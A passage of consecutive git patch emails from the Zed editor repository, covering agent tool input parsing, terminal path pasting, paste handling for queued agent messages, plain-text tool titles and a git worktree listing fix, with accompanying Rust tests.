`subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) - `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API From fbc705599dd31cf0d18896e71f60b2b79fcb2310 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 16:40:43 +0200 Subject: [PATCH 197/231] agent: Allow model to provide stringified `timezone` in `now` tool (#55776) See https://github.com/zed-industries/zed/issues/55186#issuecomment-4376114420 I think the recent changes to the tool schema in #55763 will make this more unlikely, but does not hurt to allow the model to provide `"utc"`. Release Notes: - N/A --- crates/agent/src/tools.rs | 27 ++++++++++++++++++++++++ crates/agent/src/tools/edit_file_tool.rs | 26 ++--------------------- crates/agent/src/tools/now_tool.rs | 27 ++++++++++++++++++++++++ 3 files changed, 56 insertions(+), 24 deletions(-) diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index e629f41e6d5d77..71ee0b2ba1714f 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -30,6 +30,33 @@ mod web_search_tool; use crate::AgentTool; use language_model::{LanguageModelRequestTool, LanguageModelToolSchemaFormat}; +use serde::{ + Deserialize, Deserializer, + de::{DeserializeOwned, Error as _}, +}; + +/// Deserialize a value that may have been provided as a JSON-encoded string +/// instead of the structured value. Some models occasionally stringify nested +/// arguments, so we accept either form. +pub(crate) fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + #[derive(Deserialize)] + #[serde(untagged)] + enum ValueOrJsonString { + Value(T), + String(String), + } + + match ValueOrJsonString::::deserialize(deserializer)? { + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), + } +} pub use apply_code_action_tool::*; pub use context_server_registry::*; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 234b4ac92f29d3..69f7be4662abcb 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -2,6 +2,7 @@ mod reindent; mod streaming_fuzzy_matcher; mod streaming_parser; +use super::deserialize_maybe_stringified; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; use crate::ToolInputPayload; @@ -24,10 +25,7 @@ use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{ - Deserialize, Deserializer, Serialize, - de::{DeserializeOwned, Error as _}, -}; +use serde::{Deserialize, Serialize}; use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; @@ -134,26 +132,6 @@ pub struct PartialEdit { pub new_text: Option, } -#[derive(Deserialize)] -#[serde(untagged)] -enum ValueOrJsonString { - Value(T), - String(String), -} - -fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result -where - T: DeserializeOwned, - D: Deserializer<'de>, -{ - match ValueOrJsonString::::deserialize(deserializer)? { - ValueOrJsonString::Value(value) => Ok(value), - ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { - D::Error::custom(format!("failed to parse stringified value: {error}")) - }), - } -} - #[derive(Debug, Serialize, Deserialize)] #[serde(untagged)] pub enum EditFileToolOutput { diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 4032731097c8c0..d60e4c7f1d6baf 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -6,6 +6,7 @@ use gpui::{App, SharedString, Task}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; +use super::deserialize_maybe_stringified; use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[derive(Debug, Serialize, Deserialize, JsonSchema)] @@ -23,6 +24,7 @@ pub enum Timezone { #[derive(Debug, Serialize, Deserialize, JsonSchema)] pub struct NowToolInput { /// The timezone to use for the datetime. Use `utc` for UTC, or `local` for the system's local time. + #[serde(deserialize_with = "deserialize_maybe_stringified")] timezone: Timezone, } @@ -62,3 +64,28 @@ impl AgentTool for NowTool { }) } } + +#[cfg(test)] +mod tests { + use super::*; + use gpui::TestAppContext; + use serde_json::json; + + #[gpui::test] + async fn test_stringified_timezone_input_succeeds(cx: &mut TestAppContext) { + let tool = Arc::new(NowTool); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "timezone": "\"utc\"" + })); + + let result = task.await.unwrap(); + assert!( + result.starts_with("The current datetime is "), + "unexpected output: {result}" + ); + } +} From 1a65b2a566e0628ef59bc886eb9bdbe616dd5ab7 Mon Sep 17 00:00:00 2001 From: George Waters Date: Tue, 5 May 2026 10:50:57 -0400 Subject: [PATCH 198/231] Support path pasting in terminal (#48222) This adds the functionality to support pasting the file path of an item when the copied item supports it. This mirrors the behavior of `Terminal.app` on macOS. This only implements the functionality on macOS but could be extended to other platforms. I find this convenient when I'm using Finder to navigate around the file system and I want to copy a directory or file path and put it in the terminal. You can copy the item from Finder and paste it into the terminal and it will write out the full path of the item, making it easy to change directories or provide path parameters to commands. Release Notes: - Added path pasting functionality in terminal --- assets/keymaps/default-macos.json | 1 + assets/keymaps/default-windows.json | 1 + crates/terminal/src/terminal.rs | 2 ++ crates/terminal_view/src/terminal_view.rs | 25 +++++++++++++++++++---- 4 files changed, 25 insertions(+), 4 deletions(-) diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 8e115985db8d92..d73c6d7a8b65de 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1264,6 +1264,7 @@ "ctrl-cmd-space": "terminal::ShowCharacterPalette", "cmd-c": "terminal::Copy", "cmd-v": "terminal::Paste", + "ctrl-cmd-v": "terminal::PasteText", "cmd-f": "buffer_search::Deploy", "cmd-a": "editor::SelectAll", "cmd-k": "terminal::Clear", diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 9ac7ed46cfd737..fc1d78b39f29c3 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1221,6 +1221,7 @@ "shift-insert": "terminal::Paste", "ctrl-v": "terminal::Paste", "ctrl-shift-v": "terminal::Paste", + "ctrl-alt-v": "terminal::PasteText", "ctrl-i": "assistant::InlineAssist", "alt-b": ["terminal::SendText", "\u001bb"], "alt-f": ["terminal::SendText", "\u001bf"], diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 3be023e8262f04..99b3b9d6ce4ad2 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -84,6 +84,8 @@ actions!( Copy, /// Pastes from the clipboard. Paste, + /// Pastes the text from the clipboard. + PasteText, /// Shows the character palette for special characters. ShowCharacterPalette, /// Searches for text in the terminal. diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index 36bac03312356d..a6e28a95f50de4 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -32,9 +32,9 @@ use std::{ }; use task::TaskId; use terminal::{ - Clear, Copy, Event, HoveredWord, MaybeNavigationTarget, Paste, ScrollLineDown, ScrollLineUp, - ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ShowCharacterPalette, TaskState, - TaskStatus, Terminal, TerminalBounds, ToggleViMode, + Clear, Copy, Event, HoveredWord, MaybeNavigationTarget, Paste, PasteText, ScrollLineDown, + ScrollLineUp, ScrollPageDown, ScrollPageUp, ScrollToBottom, ScrollToTop, ShowCharacterPalette, + TaskState, TaskStatus, Terminal, TerminalBounds, ToggleViMode, alacritty_terminal::{ index::Point as AlacPoint, term::{TermMode, point_to_viewport, search::RegexSearch}, @@ -508,6 +508,7 @@ impl TerminalView { .separator() .action("Copy", Box::new(Copy)) .action("Paste", Box::new(Paste)) + .action("Paste Text", Box::new(PasteText)) .action("Select All", Box::new(SelectAll)) .action("Clear", Box::new(Clear)) .when(assistant_enabled, |menu| { @@ -811,7 +812,7 @@ impl TerminalView { } ///Attempt to paste the clipboard into the terminal - fn paste(&mut self, _: &Paste, _: &mut Window, cx: &mut Context) { + fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { let Some(clipboard) = cx.read_from_clipboard() else { return; }; @@ -820,6 +821,9 @@ impl TerminalView { Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => { self.forward_ctrl_v(cx); } + Some(ClipboardEntry::ExternalPaths(paths)) => { + self.add_paths_to_terminal(paths.paths(), window, cx); + } _ => { if let Some(text) = clipboard.text() { self.terminal @@ -829,6 +833,18 @@ impl TerminalView { } } + ///Attempt to paste the clipboard text into the terminal + fn paste_text(&mut self, _: &PasteText, _: &mut Window, cx: &mut Context) { + let Some(clipboard) = cx.read_from_clipboard() else { + return; + }; + + if let Some(text) = clipboard.text() { + self.terminal + .update(cx, |terminal, _cx| terminal.paste(&text)); + } + } + /// Emits a raw Ctrl+V so TUI agents can read the OS clipboard directly /// and attach images using their native workflows. fn forward_ctrl_v(&self, cx: &mut Context) { @@ -1226,6 +1242,7 @@ impl Render for TerminalView { .on_action(cx.listener(TerminalView::send_keystroke)) .on_action(cx.listener(TerminalView::copy)) .on_action(cx.listener(TerminalView::paste)) + .on_action(cx.listener(TerminalView::paste_text)) .on_action(cx.listener(TerminalView::clear)) .on_action(cx.listener(TerminalView::scroll_line_up)) .on_action(cx.listener(TerminalView::scroll_line_down)) From 0860f4a097058560be1c63cadebd70589b5aa45f Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 5 May 2026 12:06:14 -0300 Subject: [PATCH 199/231] Promote queued message to main editor on paste (#55780) Pasting text or an image into a queued-message editor used to be a silent no-op for text and a panic for images. This change makes pasting into a queued message behave like typing into one: the queued message is promoted into the main editor at the cursor position, and the paste is then applied there. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55521 Release Notes: - Fixed a crash when pasting an image into a queued message --- crates/agent_ui/src/conversation_view.rs | 128 ++++++++++++++++-- .../src/conversation_view/thread_view.rs | 43 +++--- crates/agent_ui/src/message_editor.rs | 86 ++++++++---- crates/editor/src/editor.rs | 39 ++++-- 4 files changed, 220 insertions(+), 76 deletions(-) diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 6ddac5f3f9fb73..c01d8d8c04ccbd 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -81,7 +81,7 @@ use crate::agent_connection_store::{ }; use crate::agent_diff::AgentDiff; use crate::entry_view_state::{EntryViewEvent, ViewEvent}; -use crate::message_editor::{MessageEditor, MessageEditorEvent}; +use crate::message_editor::{InputAttempt, MessageEditor, MessageEditorEvent}; use crate::profile_selector::{ProfileProvider, ProfileSelector}; use crate::thread_metadata_store::{ThreadId, ThreadMetadataStore}; @@ -1387,7 +1387,7 @@ impl ConversationView { fn move_queued_message_to_main_editor( &mut self, index: usize, - inserted_text: Option<&str>, + attempt: Option, cursor_offset: Option, window: &mut Window, cx: &mut Context, @@ -1396,7 +1396,7 @@ impl ConversationView { active.update(cx, |active, cx| { active.move_queued_message_to_main_editor( index, - inserted_text, + attempt, cursor_offset, window, cx, @@ -2384,15 +2384,17 @@ impl ConversationView { window, move |this, _editor, event, window, cx| match event { MessageEditorEvent::InputAttempted { - text, + attempt, cursor_offset, - } => this.move_queued_message_to_main_editor( - index, - Some(text.as_ref()), - Some(*cursor_offset), - window, - cx, - ), + } => { + this.move_queued_message_to_main_editor( + index, + Some(attempt.clone()), + Some(*cursor_offset), + window, + cx, + ); + } MessageEditorEvent::LostFocus => { this.save_queued_message_at_index(index, cx); } @@ -2958,8 +2960,9 @@ pub(crate) mod tests { use agent::{AgentTool, EditFileTool, FetchTool, TerminalTool, ToolPermissionContext}; use agent_servers::FakeAcpAgentServer; use editor::MultiBufferOffset; + use editor::actions::Paste; use fs::FakeFs; - use gpui::{EventEmitter, TestAppContext, VisualTestContext}; + use gpui::{ClipboardItem, EventEmitter, TestAppContext, VisualTestContext}; use parking_lot::Mutex; use project::Project; use serde_json::json; @@ -7405,6 +7408,107 @@ pub(crate) mod tests { ); } + #[gpui::test] + async fn test_paste_text_into_queued_message_promotes_to_main_editor(cx: &mut TestAppContext) { + init_test(cx); + + let (conversation_view, cx) = + paste_into_queued_message(cx, ClipboardItem::new_string("PASTED".to_string())).await; + + let queue_len = active_thread(&conversation_view, cx) + .read_with(cx, |thread, _cx| thread.local_queued_messages.len()); + assert_eq!(queue_len, 0); + + let text = message_editor(&conversation_view, cx).update(cx, |editor, cx| editor.text(cx)); + assert_eq!(text, "queued PASTEDmessage"); + } + + #[gpui::test] + async fn test_paste_image_into_queued_message_promotes_to_main_editor(cx: &mut TestAppContext) { + init_test(cx); + + use base64::Engine as _; + use std::io::Write as _; + let png_bytes = base64::prelude::BASE64_STANDARD + .decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==") + .unwrap(); + let mut image_file = tempfile::Builder::new().suffix(".png").tempfile().unwrap(); + image_file.write_all(&png_bytes).unwrap(); + + let (conversation_view, cx) = paste_into_queued_message( + cx, + ClipboardItem { + entries: vec![gpui::ClipboardEntry::ExternalPaths(gpui::ExternalPaths( + vec![image_file.path().to_path_buf()].into(), + ))], + }, + ) + .await; + + let queue_len = active_thread(&conversation_view, cx) + .read_with(cx, |thread, _cx| thread.local_queued_messages.len()); + assert_eq!(queue_len, 0); + + let text = message_editor(&conversation_view, cx).update(cx, |editor, cx| editor.text(cx)); + let image_name = image_file.path().file_name().unwrap().to_string_lossy(); + let expected_uri = acp_thread::MentionUri::PastedImage { + name: image_name.to_string(), + } + .to_uri() + .to_string(); + assert_eq!( + text, + format!("queued [@{image_name}]({expected_uri}) message"), + ); + } + + async fn paste_into_queued_message( + cx: &mut TestAppContext, + clipboard: ClipboardItem, + ) -> (Entity, &mut VisualTestContext) { + let (conversation_view, cx) = + setup_conversation_view(StubAgentServer::default_response(), cx).await; + add_to_workspace(conversation_view.clone(), cx); + + active_thread(&conversation_view, cx).update_in(cx, |thread, _window, cx| { + thread + .session_capabilities + .write() + .set_prompt_capabilities(acp::PromptCapabilities::new().image(true)); + thread.add_to_queue( + vec![acp::ContentBlock::Text(acp::TextContent::new( + "queued message".to_string(), + ))], + vec![], + cx, + ); + }); + conversation_view.update(cx, |_, cx| cx.notify()); + cx.run_until_parked(); + + let queued_editor = active_thread(&conversation_view, cx).read_with(cx, |thread, _cx| { + thread + .queued_message_editors + .first() + .cloned() + .expect("queued message editor not synced") + }); + + cx.write_to_clipboard(clipboard); + + queued_editor.update_in(cx, |message_editor, window, cx| { + message_editor.editor().update(cx, |editor, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |selections| { + selections.select_ranges([MultiBufferOffset(7)..MultiBufferOffset(7)]); + }); + }); + message_editor.paste(&Paste, window, cx); + }); + cx.run_until_parked(); + + (conversation_view, cx) + } + #[gpui::test] async fn test_close_all_sessions_skips_when_unsupported(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 44b51bb491ed5e..0e0b3d04a8dbc6 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -1539,7 +1539,7 @@ impl ThreadView { pub fn move_queued_message_to_main_editor( &mut self, index: usize, - inserted_text: Option<&str>, + attempt: Option, cursor_offset: Option, window: &mut Window, cx: &mut Context, @@ -1549,36 +1549,35 @@ impl ThreadView { }; let queued_content = queued_message.content; let message_editor = self.message_editor.clone(); - let inserted_text = inserted_text.map(ToOwned::to_owned); window.focus(&message_editor.focus_handle(cx), cx); - if message_editor.read(cx).is_empty(cx) { + let adjusted_cursor_offset = if message_editor.read(cx).is_empty(cx) { message_editor.update(cx, |editor, cx| { editor.set_message(queued_content, window, cx); - if let Some(offset) = cursor_offset { - editor.set_cursor_offset(offset, window, cx); - } - if let Some(inserted_text) = inserted_text.as_deref() { - editor.insert_text(inserted_text, window, cx); - } }); - cx.notify(); - return true; - } - - // Adjust cursor offset accounting for existing content - let existing_len = message_editor.read(cx).text(cx).len(); - let separator = "\n\n"; + cursor_offset + } else { + let existing_len = message_editor.read(cx).text(cx).len(); + let separator = "\n\n"; + message_editor.update(cx, |editor, cx| { + editor.append_message(queued_content, Some(separator), window, cx); + }); + cursor_offset.map(|offset| existing_len + separator.len() + offset) + }; message_editor.update(cx, |editor, cx| { - editor.append_message(queued_content, Some(separator), window, cx); - if let Some(offset) = cursor_offset { - let adjusted_offset = existing_len + separator.len() + offset; - editor.set_cursor_offset(adjusted_offset, window, cx); + if let Some(offset) = adjusted_cursor_offset { + editor.set_cursor_offset(offset, window, cx); } - if let Some(inserted_text) = inserted_text.as_deref() { - editor.insert_text(inserted_text, window, cx); + match attempt { + Some(InputAttempt::Text(text)) => { + editor.insert_text(&text, window, cx); + } + Some(InputAttempt::Paste(clipboard)) => { + editor.paste_item(&clipboard, window, cx); + } + None => {} } }); diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index 401c282201d84f..d839e87d98ee91 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -145,6 +145,12 @@ pub struct MessageEditor { _parse_slash_command_task: Task<()>, } +#[derive(Clone, Debug)] +pub enum InputAttempt { + Text(Arc), + Paste(ClipboardItem), +} + #[derive(Clone, Debug)] pub enum MessageEditorEvent { Send, @@ -153,7 +159,7 @@ pub enum MessageEditorEvent { Focus, LostFocus, InputAttempted { - text: Arc, + attempt: InputAttempt, cursor_offset: usize, }, } @@ -494,7 +500,7 @@ impl MessageEditor { .to_offset(&editor.buffer().read(cx).snapshot(cx)) .0; cx.emit(MessageEditorEvent::InputAttempted { - text: text.clone(), + attempt: InputAttempt::Text(text.clone()), cursor_offset, }); } @@ -954,18 +960,47 @@ impl MessageEditor { cx.emit(MessageEditorEvent::Cancel) } - fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + let Some(clipboard) = cx.read_from_clipboard() else { + return; + }; + + if self.editor.read(cx).read_only(cx) { + let editor = self.editor.read(cx); + let cursor_offset = editor + .selections + .newest_anchor() + .head() + .to_offset(&editor.buffer().read(cx).snapshot(cx)) + .0; + cx.emit(MessageEditorEvent::InputAttempted { + attempt: InputAttempt::Paste(clipboard), + cursor_offset, + }); + cx.stop_propagation(); + return; + } + + cx.stop_propagation(); + self.paste_item(&clipboard, window, cx); + } + + pub fn paste_item( + &mut self, + clipboard: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) { let Some(workspace) = self.workspace.upgrade() else { return; }; - let editor_clipboard_selections = cx.read_from_clipboard().and_then(|item| { - item.entries().iter().find_map(|entry| match entry { + let editor_clipboard_selections = + clipboard.entries().iter().find_map(|entry| match entry { ClipboardEntry::String(text) => { text.metadata_json::>() } _ => None, - }) - }); + }); // Insert creases for pasted clipboard selections that: // 1. Contain exactly one selection @@ -997,7 +1032,6 @@ impl MessageEditor { .unwrap_or(false); if should_insert_creases && let Some(selections) = editor_clipboard_selections { - cx.stop_propagation(); let snapshot = self.editor.read(cx).buffer().read(cx).snapshot(cx); let (insertion_target, _) = snapshot .anchor_to_buffer_anchor(self.editor.read(cx).selections.newest_anchor().start) @@ -1085,14 +1119,12 @@ impl MessageEditor { } // Handle text paste with potential markdown mention links before // clipboard context entries so markdown text still pastes as text. - if let Some(clipboard_text) = cx.read_from_clipboard().and_then(|item| { - item.entries().iter().find_map(|entry| match entry { - ClipboardEntry::String(text) => Some(text.text().to_string()), - _ => None, - }) - }) { + let clipboard_text = clipboard.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(text) => Some(text.text().to_string()), + _ => None, + }); + if let Some(clipboard_text) = clipboard_text.as_deref() { if clipboard_text.contains("[@") { - cx.stop_propagation(); let selections_before = self.editor.update(cx, |editor, cx| { let snapshot = editor.buffer().read(cx).snapshot(cx); editor @@ -1109,7 +1141,7 @@ impl MessageEditor { }); self.editor.update(cx, |editor, cx| { - editor.insert(&clipboard_text, window, cx); + editor.insert(clipboard_text, window, cx); }); let snapshot = self.editor.read(cx).buffer().read(cx).snapshot(cx); @@ -1180,12 +1212,13 @@ impl MessageEditor { } } - if self.handle_pasted_context(window, cx) { + if self.handle_pasted_context(clipboard, window, cx) { return; } - // Fall through to default editor paste - cx.propagate(); + self.editor.update(cx, |editor, cx| { + editor.paste_item(clipboard, window, cx); + }); } fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { @@ -1205,11 +1238,12 @@ impl MessageEditor { }); } - fn handle_pasted_context(&mut self, window: &mut Window, cx: &mut Context) -> bool { - let Some(clipboard) = cx.read_from_clipboard() else { - return false; - }; - + fn handle_pasted_context( + &mut self, + clipboard: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) -> bool { if matches!( clipboard.entries().first(), Some(ClipboardEntry::String(_)) | None @@ -1229,9 +1263,7 @@ impl MessageEditor { let editor = self.editor.clone(); let mention_set = self.mention_set.clone(); let workspace = self.workspace.clone(); - let entries = clipboard.into_entries().collect::>(); - - cx.stop_propagation(); + let entries = clipboard.clone().into_entries().collect::>(); window .spawn(cx, async move |mut cx| { diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index d9dd6078c08953..a57b705856040b 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -14756,24 +14756,33 @@ impl Editor { } pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if let Some(item) = cx.read_from_clipboard() { + self.paste_item(&item, window, cx); + } + } + + pub fn paste_item( + &mut self, + item: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) { if self.read_only(cx) { return; } - if let Some(item) = cx.read_from_clipboard() { - let clipboard_string = item.entries().iter().find_map(|entry| match entry { - ClipboardEntry::String(s) => Some(s), - _ => None, - }); - match clipboard_string { - Some(clipboard_string) => self.do_paste( - clipboard_string.text(), - clipboard_string.metadata_json::>(), - true, - window, - cx, - ), - _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), - } + let clipboard_string = item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(s) => Some(s), + _ => None, + }); + match clipboard_string { + Some(clipboard_string) => self.do_paste( + clipboard_string.text(), + clipboard_string.metadata_json::>(), + true, + window, + cx, + ), + _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), } } From 95d8ca38028562110d400e130b445678219cb550 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 17:11:11 +0200 Subject: [PATCH 200/231] acp_thread: Render execute tool titles as plain text (#55783) We had a regression where the labels were being rendered as markdown, which is usually not what you want on a command Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/acp_thread/src/acp_thread.rs | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index a18f9f21e79b54..2c448d343075b6 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -299,10 +299,15 @@ impl ToolCall { let subagent_session_info = subagent_session_info_from_meta(&tool_call.meta); + let label = if tool_call.kind == acp::ToolKind::Execute { + cx.new(|cx| Markdown::new_text(title.into(), cx)) + } else { + cx.new(|cx| Markdown::new(title.into(), Some(language_registry.clone()), None, cx)) + }; + let result = Self { id: tool_call.tool_call_id, - label: cx - .new(|cx| Markdown::new(title.into(), Some(language_registry.clone()), None, cx)), + label, kind: tool_call.kind, content, locations: tool_call.locations, From ef22513fe577010f008173a9b46a2f8444eae7c7 Mon Sep 17 00:00:00 2001 From: Om Chillure Date: Tue, 5 May 2026 21:04:56 +0530 Subject: [PATCH 201/231] Fix git worktree popup popup no worktree when opened in a project (#55053) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Summary Fixes the `git: worktree` popup showing no worktrees when a project is opened at the parent of a `.bare` directory (the common bare-clone-with-sibling-worktrees layout). ## What's fixed - `crates/git/src/repository.rs` - New `git_binary_for_worktree_list` helper that uses `repository.path()` as the working directory when `workdir()` is `None`. - `worktrees()` switched to the new helper. - `parse_worktrees_from_str` accepts bare entries without a `HEAD` line. - Tests - Unit test: parser handles a bare entry with no `HEAD` followed by a normal worktree entry. - Integration test: full `.git`-file → `.bare` + sibling worktrees layout (`main`, `feature-a`, `feature-b`) is listed correctly via the real `git` binary. UI rendering already gates on empty sha (`worktree_picker.rs` uses `.when(!sha.is_empty(), ...)`), so the bare entry's empty sha renders without artifacts. ## Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments — N/A, no `unsafe` - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable — same single `git worktree list --porcelain` invocation, no extra work #### Closes #54824 Video [Screencast from 2026-04-28 09-43-45.webm](https://github.com/user-attachments/assets/e414d546-eb61-4cb2-857e-3c392f416f96) Release Notes: - Fixed the `git: worktree` popup listing no worktrees when a project was opened at the parent of a `.bare` directory (bare-clone-with-sibling-worktrees layout). --------- Co-authored-by: Max Brunsfeld --- crates/git/src/repository.rs | 142 +++++++++++++++++------------------ 1 file changed, 68 insertions(+), 74 deletions(-) diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index d98e917d69ce59..90ac06d959a1fa 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -27,7 +27,6 @@ use std::process::ExitStatus; use std::str::FromStr; use std::{ cmp::Ordering, - future, path::{Path, PathBuf}, sync::Arc, }; @@ -1089,7 +1088,7 @@ impl RealGitRepository { .map(Path::to_path_buf) } - fn git_binary(&self) -> Result { + fn git_binary_in_worktree(&self) -> Result { Ok(GitBinary::new( self.any_git_binary_path.clone(), self.working_directory() @@ -1100,12 +1099,27 @@ impl RealGitRepository { )) } + fn git_binary(&self) -> GitBinary { + let repository = self.repository.lock(); + let working_directory = repository + .workdir() + .unwrap_or_else(|| repository.path()) + .to_path_buf(); + GitBinary::new( + self.any_git_binary_path.clone(), + working_directory, + repository.path().to_path_buf(), + self.executor.clone(), + self.is_trusted(), + ) + } + fn edit_ref(&self, edit: RefEdit) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let args = edit.into_args(); - git_binary?.run(&args).await?; + git.run(&args).await?; Ok(()) }) .boxed() @@ -1115,10 +1129,10 @@ impl RealGitRepository { if let Some(output) = self.any_git_binary_help_output.lock().clone() { return output; } - let git_binary = self.git_binary(); + let git = self.git_binary(); let output: SharedString = self .executor - .spawn(async move { git_binary?.run(&["help", "-a"]).await }) + .spawn(async move { git.run(&["help", "-a"]).await }) .await .unwrap_or_default() .into(); @@ -1202,10 +1216,9 @@ impl GitRepository for RealGitRepository { } fn show(&self, commit: String) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&[ "show", @@ -1237,12 +1250,8 @@ impl GitRepository for RealGitRepository { } fn load_commit(&self, commit: String, cx: AsyncApp) -> BoxFuture<'_, Result> { - if self.repository.lock().workdir().is_none() { - return future::ready(Err(anyhow!("no working directory"))).boxed(); - } - let git_binary = self.git_binary(); + let git = self.git_binary(); cx.background_spawn(async move { - let git = git_binary?; let show_output = git .build_command(&[ "show", @@ -1372,7 +1381,7 @@ impl GitRepository for RealGitRepository { mode: ResetMode, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); async move { let mode_flag = match mode { ResetMode::Mixed => "--mixed", @@ -1401,7 +1410,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); async move { if paths.is_empty() { return Ok(()); @@ -1557,10 +1566,9 @@ impl GitRepository for RealGitRepository { env: Arc>, is_executable: bool, ) -> BoxFuture<'_, anyhow::Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let mode = if is_executable { "100755" } else { "100644" }; if let Some(content) = content { @@ -1624,10 +1632,9 @@ impl GitRepository for RealGitRepository { } fn revparse_batch(&self, revs: Vec) -> BoxFuture<'_, Result>>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let mut process = git 